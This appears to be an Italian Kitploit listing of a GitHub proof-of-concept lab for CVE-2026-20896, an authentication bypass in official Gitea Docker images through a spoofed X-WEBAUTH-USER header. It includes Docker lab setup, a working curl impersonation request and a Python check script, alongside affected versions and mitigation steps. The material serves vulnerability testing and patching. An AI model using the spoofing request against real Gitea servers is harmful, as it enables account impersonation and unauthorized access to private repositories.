Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-20896 — Laboratorio proof-of-concept e script Python/cURL che dimostrano CVE-2026-20896, un bypass di autenticazione nelle immagini Docker ufficiali di Gitea tramite l'header X-WEBAUTH-USER. | Kitploit
Strumenti/GitHubGitHub/yym8538/cve-2026-20896
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingAutenticazioneLab e Pratica
GitHubyym8538/cve-2026-20896

CVE-2026-20896

Laboratorio proof-of-concept e script Python/cURL che dimostrano CVE-2026-20896, un bypass di autenticazione nelle immagini Docker ufficiali di Gitea tramite l'header X-WEBAUTH-USER.

11 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

CVE-2026-20896: PoC di bypass dell'autenticazione per l'immagine Docker di Gitea

[!WARNING] Usa questo PoC solo in un laboratorio locale o contro un sistema che sei esplicitamente autorizzato a testare.

https://github.com/user-attachments/assets/b73af2fe-0e59-438b-80d6-be93fd75697b

Panoramica

CVE-2026-20896 è un bypass dell'autenticazione nelle immagini Docker ufficiali di Gitea interessate. Quando l'autenticazione tramite reverse proxy è abilitata, l'impostazione REVERSE_PROXY_TRUSTED_PROXIES = * generata dall'immagine consente a un client in grado di raggiungere il backend di Gitea di impersonare un utente esistente tramite l'header X-WEBAUTH-USER.

Il laboratorio crea un amministratore chiamato gitea-admin con una password casuale e memorizza CVE-2026-20896_AUTH_BYPASS_CONFIRMED nel repository privato gitea-admin/private-proof. La lettura di quel file senza conoscere la password casuale dell'amministratore dimostra il bypass.

Versioni interessate

CategoriaVersione
VulnerabileImmagini Docker ufficiali gitea/gitea ≤ 1.26.2
Prima versione corretta1.26.3
Consigliata1.26.4 o successiva

La configurazione vulnerabile richiede che l'autenticazione tramite reverse proxy sia abilitata e che il backend di Gitea sia raggiungibile direttamente, oppure che un proxy a monte preservi l'header di identità fornito dall'attaccante. Per questa riproduzione locale non è richiesto un container reverse proxy.

Ambiente

# build
docker build -t cve-2026-20896-gitea-vuln .

# run
docker run -d --rm --name cve-2026-20896-gitea-vuln -p 127.0.0.1:3000:3000 cve-2026-20896-gitea-vuln

Attendi qualche secondo per l'inizializzazione di Gitea e del repository privato di prova.

PoC

cURL

curl -s -L -H "X-WEBAUTH-USER: gitea-admin" http://127.0.0.1:3000/gitea-admin/private-proof/raw/branch/main/proof.txt

Un'exploit riuscita restituisce CVE-2026-20896_AUTH_BYPASS_CONFIRMED.

Python

python poc.py http://127.0.0.1:3000

Lo script confronta richieste non autenticate, non amministrative e con amministratore falsificato e stampa VULNERABLE quando il bypass dell'autorizzazione è confermato. Richiede Python 3.10 o successivo e utilizza solo la libreria standard.

Impatto

  • Impersonificazione di utenti Gitea noti o facilmente indovinabili
  • Accesso non autorizzato a repository privati e risorse utente
  • Azioni amministrative quando viene impersonato un account amministratore

Mitigazione

  • Aggiorna a Gitea 1.26.3 o successivo; si consiglia 1.26.4 o successivo.
  • Limita REVERSE_PROXY_TRUSTED_PROXIES agli indirizzi dei proxy attendibili.
  • Impedisci l'accesso diretto al backend di Gitea e sovrascrivi gli header di identità forniti dall'esterno.
  • Disabilita l'autenticazione tramite reverse proxy quando non è necessaria.

Pulizia

docker stop cve-2026-20896-gitea-vuln

Riferimenti

  • Gitea Security Advisory GHSA-f75j-4cw6-rmx4
  • Gitea 1.26.3 and 1.26.4 release announcement
  • Gitea security fix PR #38151
Scarica lo strumento